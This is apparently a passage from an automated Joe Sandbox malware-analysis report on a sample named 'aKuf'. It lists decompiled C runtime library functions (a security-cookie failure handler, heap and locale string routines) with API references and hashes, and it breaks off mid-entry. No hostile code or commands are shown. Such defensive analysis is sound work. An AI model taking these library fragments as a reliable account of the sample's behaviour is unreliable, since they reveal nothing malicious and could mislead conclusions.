Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Function 00580920 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00580929

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: cd6e8b06e9fc6daff329b0075f01cd6e00680555ed9156381d0d7b778eb813a9
Instruction ID: 3e9c807a23c100a99a722049cf7bfbcce58d99a4c5dbb09bf75c012b4819f226
Opcode Fuzzy Hash: cd6e8b06e9fc6daff329b0075f01cd6e00680555ed9156381d0d7b778eb813a9
Instruction Fuzzy Hash: D490047034435111DC703DFC0C01F0500013741730F7107107130FD5D5DC4055004157

Uniqueness

Uniqueness Score: -1.00%

Function 0085D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.338169523.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_85d000_aKuf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14b6f8f347a9706a96da21c6402c1839455052218bf5f18c5c64186dbdb42ad
Instruction ID: 7c41361c66a82fa2b728f0450724c396b0e7555e584cfa343b1fa9640f6f9859
Opcode Fuzzy Hash: a14b6f8f347a9706a96da21c6402c1839455052218bf5f18c5c64186dbdb42ad
Instruction Fuzzy Hash: 2701DF71908784AAE7208A29C884B62BFD8FF41725F18C11AED459F282C3789C0AD6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0085D005 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.338169523.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_85d000_aKuf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1baae6253fa441cfba383f3d9ff43ab969862126fcd56fa0f7f604a468b9687c
Instruction ID: 4df6d8b8df2d9332c7be9930d762f02139afddee40ca16e18e1fac50583f3d4a
Opcode Fuzzy Hash: 1baae6253fa441cfba383f3d9ff43ab969862126fcd56fa0f7f604a468b9687c
Instruction Fuzzy Hash: 5601696140D7C09EE7128B258C94B52BFA4EF53224F08C1DBDC888F293C2798C09C772

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0058D070 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0059395B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00593970
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 0059397B
GetCurrentProcess.KERNEL32(C0000409), ref: 00593997
TerminateProcess.KERNEL32(00000000), ref: 0059399E

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: fe0df06c90539ceafbef9747638bcbbae394f6f4d87fb50bf636bed28562d7ad
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: AB2105B4A01204EFDB20DF64E9496457FB0FB08316F804079E50D87262E7B86782CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x235bda9e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x235bda9e
				_v812 = _t12;
				_t13 =  *0x422238; // 0xdca42561
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x0040adb3
0x0040adb5
0x0040adb8
0x0040adc0
0x0040adc8
0x0040adc8
0x0040adce
0x0040add0
0x0040add8
0x00000000
0x0040ade1
0x0040add8
0x0040ade8

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00580D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: eb7e6403dd5f8ba5ba6a3fb81e78259d2f476c0977d8908b99fee0dfd0969354
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0C01F272A016008FDF61EF60C805BAB37E9FB86306F0544A4DD0AA72C2E370A8498B80

Uniqueness

Uniqueness Score: -1.00%

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x235bda9e
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,021618B8), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 005972E8 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 0059731A
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 0059732C
_malloc.LIBCMT ref: 005973F1
_malloc.LIBCMT ref: 005974B3
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 005974DE
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00597501
__freea.LIBCMT ref: 0059750B
__freea.LIBCMT ref: 00597514
___ansicp.LIBCMT ref: 00597545
___convertcp.LIBCMT ref: 00597570
_malloc.LIBCMT ref: 005975C9
_memset.LIBCMT ref: 005975EB
___convertcp.LIBCMT ref: 00597621
__freea.LIBCMT ref: 00597636
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00597650

Strings

pWhvPMhv Uhv Ohv FwIhvThv, xrefs: 0059757F, 00597650

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
String ID: pWhvPMhv Uhv Ohv FwIhvThv
API String ID: 2918745354-2975966627
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: e1d798b5b4c84754680b46d505e04e2c2383a579014320cb1e5bd7251e311bc5
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: FBB1BC7291411EAFDF219FA4CC858AE3FB9FB4C314F15846AF919A6120E731CD50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0059083C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,00590977,00000000,00000000,?,00000001,0058C22D,0058B993), ref: 0059084E
__crt_waiting_on_module_handle.LIBCMT ref: 00590859

Part of subcall function 0058E9D1: Sleep.KERNEL32(000003E8,00000000,?,0059079F,KERNEL32.DLL,?,005907EB,?,00000001,0058C22D,0058B993), ref: 0058E9DD
Part of subcall function 0058E9D1: GetModuleHandleW.KERNEL32(00000001,?,0059079F,KERNEL32.DLL,?,005907EB,?,00000001,0058C22D,0058B993), ref: 0058E9E6

__lock.LIBCMT ref: 005908B4
InterlockedIncrement.KERNEL32(?), ref: 005908C1
__lock.LIBCMT ref: 005908D5
___addlocaleref.LIBCMT ref: 005908F3

Strings

@.B, xrefs: 005908E8
KERNEL32.DLL, xrefs: 00590848, 0059084D, 00590858

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: @.B$KERNEL32.DLL
API String ID: 4021795732-2520587274
Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
Instruction ID: 96c18d68ef31ff1097d2533fa807749eea98e3f3a015f72e33f6bc0bf800c785
Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
Instruction Fuzzy Hash: 33117871A40701AEDB20AF35D90579ABFF0BF44310F50492EE859A72E2CB7499418F98

Uniqueness

Uniqueness Score: -1.00%

Function 00585A17 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00585A45

Part of subcall function 0058BAB4: __FF_MSGBANNER.LIBCMT ref: 0058BAD7
